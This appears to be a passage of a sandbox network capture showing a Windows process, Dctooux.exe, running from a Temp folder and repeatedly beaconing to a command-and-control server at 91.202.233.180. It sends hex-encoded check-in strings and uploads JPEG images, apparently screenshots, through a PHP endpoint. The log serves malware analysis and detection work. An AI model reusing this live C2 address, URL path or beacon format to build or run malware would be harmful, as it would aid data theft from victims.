Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49757	91.202.233.180	80	1456	C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe

Timestamp	Bytes transferred	Direction	Data
Apr 14, 2024 08:45:55.955775023 CEST	173	OUT	POST /g88sks2SaM/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----ODYzOTI= Host: 91.202.233.180 Content-Length: 86544 Cache-Control: no-cache
Apr 14, 2024 08:45:55.955775023 CEST	132	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4f 44 59 7a 4f 54 49 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------ODYzOTI=Content-Disposition: form-data; name="data"; filename="246122658369.jpg"Content-Type: application/octet-stream
Apr 14, 2024 08:45:55.955830097 CEST	6	OUT	Data Raw: ff d8 ff e0 Data Ascii:
Apr 14, 2024 08:45:55.955830097 CEST	6	OUT	Data Raw: 00 10 4a 46 Data Ascii: JF
Apr 14, 2024 08:45:55.955892086 CEST	6	OUT	Data Raw: 49 46 00 01 Data Ascii: IF
Apr 14, 2024 08:45:55.955892086 CEST	6	OUT	Data Raw: 01 01 00 60 Data Ascii: `
Apr 14, 2024 08:45:55.955892086 CEST	6	OUT	Data Raw: 00 60 00 00 Data Ascii: `
Apr 14, 2024 08:45:55.955936909 CEST	6	OUT	Data Raw: ff db 00 43 Data Ascii: C
Apr 14, 2024 08:45:55.955936909 CEST	6	OUT	Data Raw: 00 08 06 06 Data Ascii:
Apr 14, 2024 08:45:55.955936909 CEST	6	OUT	Data Raw: 07 06 05 08 Data Ascii:
Apr 14, 2024 08:45:55.955965996 CEST	6	OUT	Data Raw: 07 07 07 09 Data Ascii:
Apr 14, 2024 08:45:57.648121119 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:45:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49758	91.202.233.180	80	1456	C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe

Timestamp	Bytes transferred	Direction	Data
Apr 14, 2024 08:45:56.439244986 CEST	158	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Apr 14, 2024 08:45:56.770761013 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:45:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Apr 14, 2024 08:45:56.771584034 CEST	310	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Apr 14, 2024 08:45:57.108397961 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:45:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49759	91.202.233.180	80	1456	C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe

Timestamp	Bytes transferred	Direction	Data
Apr 14, 2024 08:45:57.546936989 CEST	158	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Apr 14, 2024 08:45:57.877176046 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:45:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Apr 14, 2024 08:45:57.877866030 CEST	310	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Apr 14, 2024 08:45:58.222253084 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:45:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49760	91.202.233.180	80	1456	C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe

Timestamp	Bytes transferred	Direction	Data
Apr 14, 2024 08:45:58.278686047 CEST	173	OUT	POST /g88sks2SaM/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----ODYzOTI= Host: 91.202.233.180 Content-Length: 86544 Cache-Control: no-cache
Apr 14, 2024 08:45:58.278904915 CEST	132	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4f 44 59 7a 4f 54 49 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------ODYzOTI=Content-Disposition: form-data; name="data"; filename="246122658369.jpg"Content-Type: application/octet-stream
Apr 14, 2024 08:45:58.279087067 CEST	6	OUT	Data Raw: ff d8 ff e0 Data Ascii:
Apr 14, 2024 08:45:58.279177904 CEST	6	OUT	Data Raw: 00 10 4a 46 Data Ascii: JF
Apr 14, 2024 08:45:58.279259920 CEST	6	OUT	Data Raw: 49 46 00 01 Data Ascii: IF
Apr 14, 2024 08:45:58.279335976 CEST	6	OUT	Data Raw: 01 01 00 60 Data Ascii: `
Apr 14, 2024 08:45:58.279412031 CEST	6	OUT	Data Raw: 00 60 00 00 Data Ascii: `
Apr 14, 2024 08:45:58.279491901 CEST	6	OUT	Data Raw: ff db 00 43 Data Ascii: C
Apr 14, 2024 08:45:58.279581070 CEST	6	OUT	Data Raw: 00 08 06 06 Data Ascii:
Apr 14, 2024 08:45:58.279656887 CEST	6	OUT	Data Raw: 07 06 05 08 Data Ascii:
Apr 14, 2024 08:45:58.279737949 CEST	6	OUT	Data Raw: 07 07 07 09 Data Ascii:
Apr 14, 2024 08:45:59.391480923 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:45:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49761	91.202.233.180	80	1456	C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe

Timestamp	Bytes transferred	Direction	Data
Apr 14, 2024 08:45:58.729156971 CEST	158	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Apr 14, 2024 08:45:59.059655905 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:45:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Apr 14, 2024 08:45:59.060327053 CEST	310	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Apr 14, 2024 08:45:59.394961119 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:45:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49762	91.202.233.180	80	1456	C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe

Timestamp	Bytes transferred	Direction	Data
Apr 14, 2024 08:45:59.834530115 CEST	158	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Apr 14, 2024 08:46:00.168533087 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:46:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Apr 14, 2024 08:46:00.174783945 CEST	310	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Apr 14, 2024 08:46:00.514293909 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:46:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49763	91.202.233.180	80	1456	C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe

Timestamp	Bytes transferred	Direction	Data
Apr 14, 2024 08:46:00.089663029 CEST	173	OUT	POST /g88sks2SaM/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----OTI0OTQ= Host: 91.202.233.180 Content-Length: 92646 Cache-Control: no-cache
Apr 14, 2024 08:46:00.089760065 CEST	132	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4f 54 49 30 4f 54 51 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------OTI0OTQ=Content-Disposition: form-data; name="data"; filename="246122658369.jpg"Content-Type: application/octet-stream
Apr 14, 2024 08:46:00.089822054 CEST	6	OUT	Data Raw: ff d8 ff e0 Data Ascii:
Apr 14, 2024 08:46:00.089823008 CEST	6	OUT	Data Raw: 00 10 4a 46 Data Ascii: JF
Apr 14, 2024 08:46:00.089844942 CEST	6	OUT	Data Raw: 49 46 00 01 Data Ascii: IF
Apr 14, 2024 08:46:00.089873075 CEST	6	OUT	Data Raw: 01 01 00 60 Data Ascii: `
Apr 14, 2024 08:46:00.089873075 CEST	6	OUT	Data Raw: 00 60 00 00 Data Ascii: `
Apr 14, 2024 08:46:00.089891911 CEST	6	OUT	Data Raw: ff db 00 43 Data Ascii: C
Apr 14, 2024 08:46:00.089911938 CEST	6	OUT	Data Raw: 00 08 06 06 Data Ascii:
Apr 14, 2024 08:46:00.089936972 CEST	6	OUT	Data Raw: 07 06 05 08 Data Ascii:
Apr 14, 2024 08:46:00.089955091 CEST	6	OUT	Data Raw: 07 07 07 09 Data Ascii:
Apr 14, 2024 08:46:02.756489038 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:46:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49764	91.202.233.180	80	1456	C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe

Timestamp	Bytes transferred	Direction	Data
Apr 14, 2024 08:46:00.955305099 CEST	158	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Apr 14, 2024 08:46:01.280388117 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:46:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Apr 14, 2024 08:46:01.281184912 CEST	310	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Apr 14, 2024 08:46:01.613948107 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:46:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49765	91.202.233.180	80	1456	C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe

Timestamp	Bytes transferred	Direction	Data
Apr 14, 2024 08:46:02.048648119 CEST	158	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Apr 14, 2024 08:46:02.381740093 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:46:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Apr 14, 2024 08:46:02.382975101 CEST	310	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Apr 14, 2024 08:46:02.721820116 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:46:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49766	91.202.233.180	80	1456	C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe

Timestamp	Bytes transferred	Direction	Data
Apr 14, 2024 08:46:03.158111095 CEST	158	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Apr 14, 2024 08:46:03.488919020 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:46:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Apr 14, 2024 08:46:03.496087074 CEST	310	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Apr 14, 2024 08:46:03.829911947 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:46:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49767	91.202.233.180	80	1456	C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe

Timestamp	Bytes transferred	Direction	Data
Apr 14, 2024 08:46:03.336126089 CEST	173	OUT	POST /g88sks2SaM/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----ODYzOTY= Host: 91.202.233.180 Content-Length: 86548 Cache-Control: no-cache
Apr 14, 2024 08:46:03.336328030 CEST	132	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4f 44 59 7a 4f 54 59 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------ODYzOTY=Content-Disposition: form-data; name="data"; filename="246122658369.jpg"Content-Type: application/octet-stream
Apr 14, 2024 08:46:03.336407900 CEST	6	OUT	Data Raw: ff d8 ff e0 Data Ascii:
Apr 14, 2024 08:46:03.336433887 CEST	6	OUT	Data Raw: 00 10 4a 46 Data Ascii: JF
Apr 14, 2024 08:46:03.336457014 CEST	6	OUT	Data Raw: 49 46 00 01 Data Ascii: IF
Apr 14, 2024 08:46:03.336481094 CEST	6	OUT	Data Raw: 01 01 00 60 Data Ascii: `
Apr 14, 2024 08:46:03.336503029 CEST	6	OUT	Data Raw: 00 60 00 00 Data Ascii: `
Apr 14, 2024 08:46:03.336524963 CEST	6	OUT	Data Raw: ff db 00 43 Data Ascii: C
Apr 14, 2024 08:46:03.336551905 CEST	6	OUT	Data Raw: 00 08 06 06 Data Ascii:
Apr 14, 2024 08:46:03.336577892 CEST	6	OUT	Data Raw: 07 06 05 08 Data Ascii:
Apr 14, 2024 08:46:03.336611032 CEST	6	OUT	Data Raw: 07 07 07 09 Data Ascii:
Apr 14, 2024 08:46:04.397453070 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:46:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49768	91.202.233.180	80	1456	C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe

Timestamp	Bytes transferred	Direction	Data
Apr 14, 2024 08:46:04.271778107 CEST	158	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Apr 14, 2024 08:46:04.605966091 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:46:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Apr 14, 2024 08:46:04.609556913 CEST	310	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Apr 14, 2024 08:46:04.949281931 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:46:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49769	91.202.233.180	80	1456	C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe

Timestamp	Bytes transferred	Direction	Data
Apr 14, 2024 08:46:05.015047073 CEST	173	OUT	POST /g88sks2SaM/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----ODYzOTY= Host: 91.202.233.180 Content-Length: 86548 Cache-Control: no-cache
Apr 14, 2024 08:46:05.015119076 CEST	132	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4f 44 59 7a 4f 54 59 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------ODYzOTY=Content-Disposition: form-data; name="data"; filename="246122658369.jpg"Content-Type: application/octet-stream
Apr 14, 2024 08:46:05.015182018 CEST	6	OUT	Data Raw: ff d8 ff e0 Data Ascii:
Apr 14, 2024 08:46:05.015217066 CEST	6	OUT	Data Raw: 00 10 4a 46 Data Ascii: JF
Apr 14, 2024 08:46:05.015258074 CEST	6	OUT	Data Raw: 49 46 00 01 Data Ascii: IF
Apr 14, 2024 08:46:05.015290976 CEST	6	OUT	Data Raw: 01 01 00 60 Data Ascii: `
Apr 14, 2024 08:46:05.015326023 CEST	6	OUT	Data Raw: 00 60 00 00 Data Ascii: `
